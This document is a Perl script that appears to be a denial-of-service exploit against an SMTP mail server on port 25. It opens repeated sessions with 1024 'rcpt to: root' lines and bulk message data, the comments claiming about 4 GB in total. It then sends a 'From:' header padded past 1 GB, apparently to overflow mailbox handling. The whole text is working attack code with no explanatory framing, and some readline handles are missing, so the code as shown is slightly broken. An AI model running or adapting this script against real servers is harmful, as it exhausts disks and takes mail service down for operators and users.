#!/usr/bin/perl use Socket; use Fcntl; $target_addr = "127.0.0.1"; $target_port = 25; $mail_from = "root"; $rcpt_to = "root"; $mail_data = "0123456789ABCD\r\n"; $mail_data_loop = 10*64; # 1M $rcpt_to_loop = 1024; # 1G $exploit_loop = 4; # 4G $exploit_data = "From: "; $exploit_data_sub = "abcdefghijklmnop"; $exploit_data_sub_loop = 1024*10*64; # 1G+6 $| = 1; $data = ""; for($i = 0; $i < $mail_data_loop; ++$i){ $data .= $mail_data; } for($i = 0; $i < $exploit_loop; ++$i){ &mail_send_mbox(); } &mail_send_mbox2(); sub mail_send_mbox{ local(*SOCKET); my($i,$ip,$sockaddr,$read); $ip = inet_aton($target_addr) || die "mail_send::host not found."; $sockaddr = pack_sockaddr_in($target_port, $ip); socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "mail_send::socket error"; if (!connect(SOCKET, $sockaddr)){ close(SOCKET); die "mail_send::connect error"; } # autoflush SOCKET (1); select((select(SOCKET), $| = 1)[0]); print $read = ; print SOCKET "helo mbox_dos\r\n"; print $read = ; print SOCKET "mail from: $mail_from\r\n"; print $read = ; for($i = 0; $i < $rcpt_to_loop; ++$i){ print SOCKET "rcpt to: $rcpt_to\r\n"; $read = ; } print SOCKET "data\r\n"; print $read = ; for($i = 0; $i < $mail_data_loop; ++$i){ print SOCKET $data; } print SOCKET ".\r\n"; print $read = ; print SOCKET "quit\r\n"; print $read = ; close(SOCKET); } sub mail_send_mbox2{ local(*SOCKET); my($i,$ip,$sockaddr,$read); $ip = inet_aton($target_addr) || die "mail_send::host not found."; $sockaddr = pack_sockaddr_in($target_port, $ip); socket(SOCKET, PF_INET, SOCK_STREAM, 0) || die "mail_send::socket error"; if (!connect(SOCKET, $sockaddr)){ close(SOCKET); die "mail_send::connect error"; } # autoflush SOCKET (1); select((select(SOCKET), $| = 1)[0]); print $read = ; print SOCKET "helo mbox_dos2\r\n"; print $read = ; print SOCKET "mail from: $mail_from\r\n"; print $read = ; for($i = 0; $i < $rcpt_to_loop; ++$i){ print SOCKET "rcpt to: $rcpt_to\r\n"; $read = ; } print SOCKET "data\r\n"; print $read = ; print SOCKET $exploit_data; for($i = 0; $i < $exploit_data_sub_loop; ++$i){ print SOCKET $exploit_data_sub; if (($i % 500) == 0){ print "."; } } print SOCKET "\r\n"; print SOCKET ".\r\n"; print $read = ; print SOCKET "quit\r\n"; print $read = ; close(SOCKET); }